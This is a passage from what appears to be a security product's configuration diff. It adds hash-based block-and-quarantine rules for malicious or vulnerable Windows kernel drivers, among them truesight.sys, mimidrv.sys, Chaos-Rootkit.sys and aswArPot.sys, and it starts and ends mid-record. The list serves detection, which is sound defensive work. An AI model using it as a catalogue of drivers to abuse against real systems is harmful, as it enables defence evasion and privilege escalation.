"Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6275493f-2995-52e1-8250-973da5d078ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141962Z", + "creation_date": 
"2026-03-23T11:45:31.141964Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141970Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a47692392fd8128e195aff14fc784abe68a1a0ab43c983d68d97ba63eaeffa55", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6291990d-a3c3-5d13-99dc-4fb5187f8701", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141273Z", + "creation_date": "2026-03-23T11:45:31.141275Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141280Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b3b90be121cea851e54b303e3599331327bfc4bdf71be397ce4615fc9f1d1d5a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "6291d7f2-b283-5364-9b02-655693cf92c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143439Z", + "creation_date": "2026-03-23T11:45:31.143441Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143446Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cc281510f92d2770745ad6baaecb6f5afb22e596303c3de07f605fde07acc98", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6297cfc1-c9d2-5da6-975d-7307dc432e35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452432Z", + "creation_date": "2026-03-23T11:45:30.452436Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452445Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "60fb851ce3da03c319a423979b47a95dd231085d89b26516f3e25164a1a14dfb", + "comment": "Vulnerable Kernel Driver (aka Chaos-Rootkit.sys) [https://www.loldrivers.io/drivers/abcd2c10-1078-4cf9-b320-04ca38d22f98/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62b92fb7-3905-5592-ba6b-d9a817aeacda", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825942Z", + "creation_date": "2026-03-23T11:45:31.825944Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825958Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b4bc6684efbaa77e2468395c15a26a4b705bbdc9b3d791813ce37efa72c8268a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62c454d7-3db4-577a-a6a5-f22be690a0be", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489677Z", + "creation_date": "2026-03-23T11:45:31.489680Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489688Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a59a3bbad423479b34158025455d1506d399cc94f3d9b29f85cc5424bc8c73fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62dc498f-7951-5c85-b89e-a23ec03ad09b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983613Z", + "creation_date": "2026-03-23T11:45:29.983615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "07b6d69bafcfd767f1b63a490a8843c3bb1f8e1bbea56176109b5743c8f7d357", + "comment": "Vulnerable Kernel Driver (aka HOSTNT.sys) [https://www.loldrivers.io/drivers/e42cd285-4dda-4086-a696-93ab1d6f17ca/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62e14f51-4c72-5c3c-ada0-baf238bdca90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985702Z", + "creation_date": "2026-03-23T11:45:29.985704Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985710Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ca42465bf4101ff63117c171cb31204dd29c45ba4ea7c31fd950f17e19b5d03", + "comment": "Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62e18c77-215a-5baf-b881-f8f709e89d76", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826048Z", + "creation_date": "2026-03-23T11:45:31.826050Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826055Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "015d63812a826ba39fc54f00ce6846e38fa82acd09a57adb8c7d69027bc3f327", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62e74a68-1ad5-5c86-8066-9159dea9b778", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479571Z", + "creation_date": "2026-03-23T11:45:31.479575Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479585Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f9071c4b299e0f415811c49f492ce5190ecfd13181632691c1ba16c26425b57", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62f9562b-307e-591a-b51f-8423f70fcc39", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619285Z", + "creation_date": "2026-03-23T11:45:29.619287Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619293Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "074ae477c8c7ae76c6f2b0bf77ac17935a8e8ee51b52155d2821d93ab30f3761", + "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62ff5df5-c04f-5561-bb6c-63f2507b97d2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605064Z", + "creation_date": 
"2026-03-23T11:45:29.605066Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605071Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ee2a56c1592ff0e951b452c0de064eba05b7c98e3add04c8aa3b4a84eb797a5", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62ff6ed8-2af5-5924-b008-9c059455d7d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826603Z", + "creation_date": "2026-03-23T11:45:30.826605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826611Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb4fce8163c75e9263e2baa7105ebbfb32f1f8b141c4d2a95ec7fa9411c63c05", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63146c7f-05ed-575a-aa4d-d5e7bfa85cd4", + "test_maturity_current_count": 0, 
+ "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826746Z", + "creation_date": "2026-03-23T11:45:30.826748Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826754Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ee96c28735bd6a839f15a13e6ca30692a286f5aacd4aa994016ec31d2f73ae1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6315dbe4-5515-5d7e-91d8-2bd5ceb1751a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814519Z", + "creation_date": "2026-03-23T11:45:31.814522Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814531Z", + "rule_level": null, 
+ "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc71b587095b255d48da485d290ab83c2d170fb2b930ba6ebe5019b90ed7be01", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "632cc686-f655-5f96-af47-d63cc6318254", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495041Z", + "creation_date": "2026-03-23T11:45:31.495043Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495048Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "68aff67d444cb49461384ccc104fefe41c827cf6eda6bec30666cff7f2e72e0d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "632ce104-ff31-5975-901f-878a3a15d3ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828437Z", + "creation_date": "2026-03-23T11:45:30.828439Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828444Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a1d2d98a6661b8752d1ad3679eb98928af3a110f83444356d089aa2e82161b54", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "632f3abf-ef42-5302-a829-9e61dfa36a91", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490261Z", + "creation_date": "2026-03-23T11:45:31.490263Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490269Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9b286f4ddd11441738d5992b8da3e94fdc2f815d9dfea17aec5eb9dedce8cf2a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63405bc0-80a7-5a87-89bd-48fec8c7269a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835772Z", + "creation_date": "2026-03-23T11:45:30.835774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835780Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e689ee12e6c00fc50a016040b0f4806ef873cc8792c0f43aa8c863a7a9d49b1b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6340b655-3f43-57e1-a258-75c16a07c83b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969347Z", + "creation_date": "2026-03-23T11:45:29.969349Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969354Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ebe2e9ec6d5d94c2d58fbcc9d78c5f0ee7a2f2c1aed6d1b309f383186d11dfa3", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "634274e0-4460-5d76-9d0f-07963ff5083c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831439Z", + "creation_date": "2026-03-23T11:45:30.831442Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831447Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b34989a6982c798ad8435fdc075ea340ad2a081059c9f11d0454f3bc37231992", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6348c5b1-cde3-5acd-9095-20318a5aac43", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619212Z", + "creation_date": "2026-03-23T11:45:29.619213Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619219Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ed3379d7ac1ad8bcfd13cd2502420569088ee7f1e04522ada48481d9a545a08", + "comment": "Super Micro Computer physmem tool (aka phymem64.sys) [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63504905-0cb0-59d0-8c7f-8ef86d80c487", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614980Z", + "creation_date": "2026-03-23T11:45:29.614982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614987Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "635c9606-ff46-561a-86d8-6d739d55845d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154822Z", + "creation_date": "2026-03-23T11:45:31.154824Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154829Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f5ef7639538292747b22596c39e69ea93d4e22fa88c61c7d40a297f3f5bf583b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6364052a-f4cb-553b-b50a-16b4b53f2ba6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
